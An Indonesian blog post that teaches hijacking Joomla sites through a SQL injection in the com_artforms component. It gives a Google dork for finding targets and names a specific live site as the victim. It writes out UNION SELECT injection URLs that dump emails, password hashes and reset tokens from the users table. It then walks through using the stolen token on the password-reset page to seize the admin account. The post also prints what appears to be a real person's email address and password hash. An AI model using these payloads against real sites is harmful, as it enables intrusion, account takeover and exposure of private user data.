Selasa, 24 Juli 2012

Exploit Jomla com_artforms

hmmm karna banyak yang minta toturial joomla neh ane kasih deh
jangan malas ya main manual :D
ok dech kita ke tkp :D
targetnya
cari di google
pake dork ini
inurl:”option com_artforms”
jangan malas mencari di google :D
kita dapat target yaitu :
http://www.rfnsw.org.au/
sekarang kita buka itu dan sekarang kita kasih exploid nya gan
nih exploidnya :
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users–
nah ntar jadi nya begini

nah ntar jadi nya begitu gan :)
hmmm ntar akan ada keluar email tuh hehehe contohnya ya
:marlene@strut.com.auStrut Creativemarlene@strut.com.au:marlene@strut.com.au3e8a162ac796230ac6e4117d34bf36da:3KCR7jyIfgyPhrzoyixXKJhWfY5tyg1M
nah sekarang kita open tab kita buka link tadi kita kasih lagi exploid untuk reset
password nya :)
neh gan exploid untuk reset password nya :
/index.php?option=com_user&view=reset
nah ntar jadi nya begini gan :
http://www.rfnsw.org.au//index.php?option=com_user&view=reset
ok sekarang kita ambil email yang tadi kita ke tab yang exploid di mana tempat reset password tadi
neh contoh gambar nya gan
nah kalau sudah masuk di tempat reset password kita isi aja tuh email dari hasil exploid pertama tadi
kalau sudah tekan enter
entar dia akan minta code !
jangan terburu buru dulu gan :)
sekarang kita cari user nya ok :)
nah sekarang kalian open tab buka target tadi truuss masukin exploid ini
nih exploidnya :
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users
ntar hasil nya akan begini gan :)
http://www.rfnsw.org.au//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users
ok sekarang biar jelas saya lihat kan contoh gambar user dan tokennya
nah kalau udah di lihat gambar di atas ntar hasil nya begini gan
:adminee769b82e30d7850915f7d750c4ab470
jadi kesimpulan dari gw yang angka di atas yang bercetak tebal itu code nya alias tokennya
jadi begini code tersebut agan masukin aja yang ke tempat reset password tadi kan dia minta codenya
sekarang kita masukin aja code yang bercetak tebal tadi
contoh user :
Creative : 0ad49305a4da98fe4727c267a595a693
nah jadi buat yang mau login ntar kita pake user nya admin
ok sekarang kita reset token atau code nya contoh gambar nya seperti gini gan
apabila sudah di isi kita tekan enter ntar dia akan meminta password baru gan gk percaya kan ???
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)

twitter